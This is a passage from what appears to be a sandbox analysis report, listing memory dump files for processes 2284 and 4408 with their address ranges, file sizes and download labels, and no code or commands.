Filesize
304KB

Download
memory/2284-40-0x0000000005990000-0x0000000005A5B000-memory.dmp

Filesize
812KB

Download
memory/2284-1124-0x0000000005910000-0x0000000005920000-memory.dmp

Filesize
64KB

Download
memory/2284-1128-0x00000000075A0000-0x0000000007B44000-memory.dmp

Filesize
5.6MB

Download
memory/2284-1134-0x0000000075290000-0x0000000075A40000-memory.dmp

Filesize
7.7MB

Download
memory/4408-1136-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/4408-26266-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download